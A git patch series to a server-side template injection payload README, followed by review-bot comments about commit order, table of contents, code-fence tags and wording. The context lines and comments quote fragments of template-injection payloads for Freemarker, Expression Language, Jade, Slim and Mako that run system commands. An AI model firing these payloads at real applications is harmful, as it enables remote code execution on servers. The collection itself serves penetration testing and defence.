-https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c +### ASP.NET Razor - Basic injection ```powershell @(1+2) 
@@ -91,6 +92,9 @@ https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/intro ## Expression Language EL +[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html) +> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0 + ### Expression Language EL - Basic injection ```java @@ -142,11 +146,14 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for ## Freemarker +[Official website](https://freemarker.apache.org/) +> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data. + You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) ### Freemarker - Basic injection -The template can be `${3*3}` or the legacy `#{3*3}` +The template can be `${3*3}` or the legacy `#{3*3}`. ### Freemarker - Code execution @@ -172,6 +179,9 @@ ${dwf.newInstance(ec,null)("id")} ## Handlebars +[Official website](https://github.com/HubSpot/jinjava) +> + ### Handlebars - Command Execution ```handlebars @@ -200,6 +210,9 @@ ${dwf.newInstance(ec,null)("id")} ## Jade / Codepen +[Official website](https://github.com/HubSpot/jinjava) +> + ```python - var x = root.process - x = x.mainModule.require From 25eae116755f0275cd3146a7e4bf9971adfcea65 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:57:50 +0200 Subject: [PATCH 6/6] Update README.md --- Server Side Template Injection/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index add2466..66388e3 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -179,8 +179,8 @@ ${dwf.newInstance(ec,null)("id")} ## Handlebars -[Official website](https://github.com/HubSpot/jinjava) -> +[Official website](https://handlebarsjs.com/) +> Handlebars compiles templates into JavaScript functions. ### Handlebars - Command Execution @@ -210,7 +210,7 @@ ${dwf.newInstance(ec,null)("id")} ## Jade / Codepen -[Official website](https://github.com/HubSpot/jinjava) +[Official website](https://codepen.io/) > ```python
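Review bot: the first TOC hunk of PATCH 1/6 (@@ -6,32 +6,21 @@) sorts the table of contents alphabetically while the body sections keep their old order until PATCH 3/6 moves them, so the tree after commit 1 has a TOC whose order no longer matches the headings below it; squash the TOC reorder into the commit that moves the sections (or move them in the same commit) so every commit in the series is self-consistent. All six commits are titled "Update README.md", which says nothing about what changed; a subject such as "SSTI: sort engines alphabetically and add official-site links" would make the history searchable.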
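Review bot: the Ruby entry added in the third hunk of PATCH 1/6 (@@ -45,11 +34,22 @@) lists only Basic injections, Retrieve /etc/passwd and List files and directories, but the Ruby body moved in PATCH 3/6 also contains `### Ruby - Code execution`, which gets no TOC line; add `  * [Code execution](#ruby---code-execution)`. The same hunk leaves Handlebars and Lessjs without sub-entries even though the body has `### Handlebars - Command Execution` and `### Lessjs - SSRF / LFI`, so those subsections are unreachable from the TOC.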
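Review bot: in the first hunk of PATCH 3/6 (@@ -69,85 +69,32 @@) the ASP.NET Razor `@(1+2)` block moved to the top of the file is still fenced as ```powershell while the command-execution block a few lines below it is fenced ```csharp; since the lines are being rewritten anyway, tag both the same way (csharp) so highlighting does not label Razor as PowerShell. The same hunk replaces `${1+1}` in the Expression Language section with `${1+1} `, which differs only in trailing whitespace as far as the diff shows, and is noise in a reorder commit.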
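Review bot: the hunk @@ -549,13 +467,13 @@ in PATCH 3/6 is whitespace-only: both -/+ pairs in the Jinja2 block are byte-identical apart from trailing whitespace, and the same holds for `### Jinjava - Command execution` in @@ -608,7 +526,7 @@ and `});` in @@ -706,7 +579,7 @@. Mixing trailing-whitespace cleanup into a 400-line move makes the reorder hard to verify; put the whitespace fixes in their own commit (or mention in the PR that reviewers should read it with `git diff -w`).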
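Review bot: the Twig "Template format" example re-added in the last hunk of PATCH 3/6 (@@ -723,6 +596,150 @@) reads `$output = $twig > render (`, which is not valid PHP; the method call is `$twig->render(`, and since these lines are being re-added verbatim this is the moment to correct them. The same hunk carries over mislabelled fences: the Slim payload `#{ %x|env| }` is tagged ```powershell and the Twig and Smarty blocks are tagged ```python; `ruby` for Slim and `twig`/`smarty` (or plain ``` with no language) would stop the highlighter misreading them.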
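Review bot: in the Mako block re-added in PATCH 4/6 (@@ -594,10 +506,99 @@) the "PoC :" snippet shows `>>> print(Template("${self.module.cache.util.os}").render())` followed by an empty line where the printed result should be; the output was evidently lost (an angle-bracketed module repr is exactly what a Markdown renderer swallows), so either restore it escaped in the fence or drop the empty line. In the same hunk `### Direct access to os from TemplateNamespace:` does not follow the `### Mako - …` naming used by every other subsection and ends with a colon, and the sentence under it ("Any of these payloads allows direct access to the `os` module") has no full stop. The Pebble blurb links `[Twig](./#twig)` and `[Jinja](./#jinja2)`; the TOC in this file uses bare `#twig`/`#jinja2` anchors, so the `./` prefix is inconsistent and unnecessary.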
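Review bot: the Expression Language blurb added in PATCH 5/6 (@@ -91,6 +92,9 @@) reads "Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc." and ends "It was introduced in JSP 2.0" without a full stop; if this is meant as a quotation from the linked Oracle tutorial it should be verbatim, and if it is a paraphrase it needs the missing articles and plurals ("is a mechanism", "JavaBeans components and other objects such as request, session and application").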
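Review bot: the Handlebars hunk of PATCH 5/6 (@@ -172,6 +179,9 @@) adds `[Official website](https://github.com/HubSpot/jinjava)` followed by an empty `>` blockquote, copied from the Jinjava entry, and the next hunk (@@ -200,6 +210,9 @@) does the same under Jade / Codepen; PATCH 6/6 then corrects the Handlebars link and the Jade link. Squash 5/6 and 6/6 so that no commit in the history points Handlebars and Jade readers at the Jinjava repository.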
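Review bot: the Jade / Codepen hunk of PATCH 6/6 (@@ -210,7 +210,7 @@) changes the link to https://codepen.io/ but leaves the blockquote below it as a bare `>`; either add a one-line description as the other sections have or remove the line. CodePen is an online front-end editor rather than the template engine's documentation; the `- var`, `=` and `#{}` syntax used by the two payloads in this section is Jade's, and Jade has since been renamed Pug (https://pugjs.org), so that is the site to cite for the engine.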